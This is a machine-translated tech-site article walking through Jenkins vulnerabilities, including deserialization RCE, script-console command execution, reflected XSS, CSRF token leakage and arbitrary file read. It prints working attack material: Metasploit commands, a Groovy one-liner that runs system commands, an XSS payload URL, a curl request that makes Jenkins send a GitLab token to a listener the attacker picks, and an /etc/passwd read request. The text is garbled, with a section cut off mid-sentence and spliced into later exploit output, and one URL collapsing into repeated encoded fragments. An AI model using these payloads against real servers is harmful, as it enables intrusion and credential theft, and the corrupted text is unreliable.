Shulou(Shulou.com)05/31 Report--

This article mainly introduces the example analysis of Jenkins vulnerabilities, which has a certain reference value. Interested friends can refer to it. I hope you will gain a lot after reading this article. Let's take a look at it.

1. Introduction

Jenkins is an open source software project based on Java, which is mainly used for CI (continuous Integration), project management and so on.

Jenkins features include:

Continuous software release / test project.

Monitor the work performed by external calls.

2. Service detection and discovery

Fofa: app= "Jenkins"

3. CVE-2017-1000353 Jenkins-CI remote code execution 3.1, vulnerability description

The Jenkins unauthorized remote code execution vulnerability allows attackers to transfer serialized Java SignedObject objects to Jenkins CLI for processing, deserializing ObjectInputStream as Command objects, which bypasses blacklist-based protection mechanisms and leads to code execution.

3.2. Affect the version

All major versions of Jenkins are affected (including 127.0.0.1msf exploit (jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/genericPAYLOAD = > cmd/unix/genericmsf exploit (jenkins_ldap_deserialize) > set CMD 'touch / tmp/wtf'CMD = > touch / tmp/wtfmsf exploit (jenkins_ldap_deserialize) > run [*] Exploit completed, but no session was created.

After successful utilization, the wtf file will be created under the tmp folder.

12. Remote command execution caused by unauthorized access to the Jenkins function, vulnerability description

After the Jenkins management login, the background "system management" function, there is a "script command line" function, its function is to execute any script command for management or fault detection or diagnosis, using this function, you can execute system commands, this function is actually Jenkins normal function, because many management accounts use weak passwords, or there is unauthorized access in the management background. As a result, this function will cause serious impact and harm to the Jenkins system server.

12.2. Affect the version

Belongs to the normal function of Jenkins

12.3. Loopholes and benefits

Find "system Administration"-"script Command Line".

Enter the following statement on the script command line to execute the corresponding command:

Println "whoami". Execute (). Text

13. CVE-2019-10475 plug-in reflective XSS13.1, vulnerability description

Build-metrics this plug-in generates some basic build metrics and is usually used with the Jenkins sidebar link plug-in. The plug-in provides the reporting mechanism so that all users can go to the Jenkins dashboard and extract the report as needed. The vulnerability exists in the build-metrics plug-in, but it is a simple reflective XSS vulnerability that fails to properly escape tag query parameters.

13.2, affected version

360 FireLine plug-ins up to 1.7.2

Bitbucket OAuth plug-in, up to 0.9

Build-metrics plugin 1.3 and below

Deploy WebLogic Plugin up to 4.1

Dynatrace application monitoring plug-in, up to 2.1.3

Dynatrace application monitoring plug-in, up to 2.1.4

ElasticBox Jenkins Kubernetes CI / CD plug-in, up to 1.3

Contains global Post Script plug-ins of 1.1.4 and below

Libvirt Slaves plug-in, up to 1.8.5

Mattermost Notification plug-ins as of 2.7.0

Sonar Gerrit plug-in, up to 2.3

Zulip plug-ins (including 1.1.0 and below)

13.3. Loopholes and benefits

The vulnearble plug-in is located in http://localhost:8080/plugin/build-metrics/ and the vulnerability parameter is label.

Payload is as follows:

Http://192.168.1.75:8080/plugin/build-metrics/getBuildStats?label=alert("CVE-2019-10475")&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+ % 22jobFilter% 22% 3A11% 22% 22% 2C,% 22nodeFilteringType% 22% 3A13% 22ALL% 22% 2C,% 22nodeNameRegpe% 22% 3Abs% 22% 22% 2C,% 22nodeFilter% 22% 3A13% 22% 22% 2C,% 22launcherFilteringType22% 3AA13% 22ALL% 22% 2C,% 22launcherNameRegex% 22% 3A13% 22% 22% 2C,% 22launcherFilteringType22% 22% 2C, 22causeFilteringType22% 22% 2C22% A3% 22% 22% 2C22% 22% 22% 2C22% 22% 22% 2C22% 22% 22% 2C22% 22% 22% 22% 2C22% 22% 22% 22% 2C22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22% 22C% 22% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C% 22C % 22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search14, CVE-2018-1000110 user enumeration 14.1, vulnerability description

Git Plugin is used in one of the version control plug-ins. Security vulnerabilities exist in GitStatus.java files in CloudBees Jenkins Git Plugin 3.7.0 and earlier. An attacker can exploit this vulnerability to obtain a list of nodes and users.

14.2, affected version

CloudBees Jenkins Git Plugin 3.7.0 and earlier

14.3. Loopholes and benefits

Fuzzy search

Http://x.x.x.x:8080/search/?q=ahttp://x.x.x.x:8080/search/suggest?query=a

If the git plug-in is less than 3.7, you can also use the following

Http://x.x.x.x:8080/git/search/?q=ahttp://x.x.x.x:8080/git/search/suggest?query=a15, CVE-2019-10352 path traversing arbitrary file writing 15.1, vulnerability description

CloudBees Jenkins (Hudson Labs) is a set of continuous integration tools based on Java developed by CloudBees Company in the United States. This product is mainly used to monitor continuous software release / test projects and some scheduled tasks. LTS is a long-supported version of CloudBeesJenkins. A path traversal vulnerability exists in core/src/main/java/hudson/model/FileParameterValue.java files in CloudBees Jenkins 2.185 and earlier, and LTS 2.176.1 and earlier. The vulnerability is due to the failure of a network system or product to properly filter resources or special elements in the file path. An attacker can exploit this vulnerability to access locations outside of a restricted directory.

15.2. Affected version

Jenkins-Ci Jenkins LTS 2.176.2 Jenkins Jenkins 2.186

15.3. Loopholes and profit

First select "build a free-style software project" and name it test, then use the restricted users, select the file parameters in the configuration

Select Build with Parameters and then build choose to upload image file.

By choosing to start the build, you can write the file to any location on the file system of the user running Jenkins with write permission.

16. CVE-2019-10300 GitLab plug-in cross-site request forgery 16.1, vulnerability description

GitLab Plugin is one of the build triggers used, which allows GitLab to trigger Jenkins builds when code is pushed or merge requests are created. There is a cross-site request forgery vulnerability in the GitLabConnectionConfig#doTestConnection form authentication method in CloudBees Jenkins GitLab Plugin 1.5.11 and earlier, which stems from the fact that the WEB application does not adequately verify that the request comes from a trusted user. An attacker can exploit this vulnerability to send unexpected requests to the server through the affected client.

16.2, affected version

Jenkins GitLab plug-in 1.5.11

16.3. Loopholes and benefits

An example of an attack on an instance of Jenkins 2.165.

You need to download the plug-in:

Https://mirrors.tuna.tsinghua.edu.cn/jenkins/plugins/gitlab-plugin/1.5.11/gitlab-plugin.hpi

The instance runs a vulnerable version of this plug-in and is configured to allow anonymous read access.

$curl-s-X GET-G\-d 'url= http://127.0.0.1:7000/?'\-d 'clientBuilderId=autodetect'\-d 'apiTokenId=532ba431-e25d-4aad-bc74-fb5b2cc03bd7'\ 'http://127.0.0.1:8080/jenkins/descriptorByName/com.dabsquared.gitlabjenkins.connection.GitLabConnectionConfig/testConnection'

The request submitted by the plug-in to the remote server as HTTP GET will be similar to the following:

# First request from Jenkins (GET). / api/v4/userAccept: application/jsonPRIVATE-TOKEN: ASecretTextEntryHost: 127.0.0.1:7000Connection: Keep-Alive# Second request from Jenkins (GET) / api/v3/userAccept: application/jsonPRIVATE-TOKEN: ASecretTextEntryHost: 127.0.0.1:7000Connection: Keep-Alive17, CVE-2018-1999002 arbitrary file read 17.1, vulnerability description

An arbitrary file read vulnerability exists in Jenkins's Stapler Web framework. By sending a specially crafted HTTP request, a malicious attacker can obtain, without authorization, the contents of arbitrary files in the Jenkins file system that the Jenkin main process can access.

17.2, affected version

Jenkins weekly 2.132 and all previous versions

Jenkins LTS 2.121.1 and all previous versions

17.3. Leak and profit

Any file in the Windows system server can be read, and the file in the Linux system server can also be read under certain conditions.

If the requested url is / plugin/credentials/.ini, base is empty, the extension (ext variable) is .ini, and then through a series of attempts openURL, in this case, the last case, con = openURL (map (base+'_'+ locale.getLanguage () + ext));, will request _.. / windows/win.ini, even though the directory _.. It doesn't exist, but it can be bypassed directly through path traversing under win.

In the case of no login (unauthorized), only when the administrator opens allow anonymous read access, can any file be read, otherwise you still need to log in.

Payload under Windows:

GET / plugin/credentials/.ini HTTP/1.1Host: x.x.x.x:8080Accept: text/javascript, text/html, application/xml, text/xml, * / * X-Prototype-Version: 1.7DNT: 1X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64 X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36Origin: http://x.x.x.x:8080Referer: http://x.x.x.x:8080/Accept-Encoding: gzip, deflateAccept-Language: /.. / etc/passwdCookie: JSESSIONID.450017e3=x6kdpnkcgllh28wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971Connection: close

You can also take advantage of the vulnerability poc detection tool to detect and decrypt the account password:

Https://github.com/anntsmart/CVE/blob/master/cve-2018-1999002.py18, CVE-2019-1003029 Script Security Plugin sandbox bypass

This vulnerability, like the CVE-2019-1003005 vulnerability, is also caused by the Script Security plug-in. The way of using it is the same as above. The affected version is below 1.55.

Thank you for reading this article carefully. I hope the article "sample Analysis of Jenkins vulnerabilities" shared by the editor will be helpful to you. At the same time, I also hope that you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.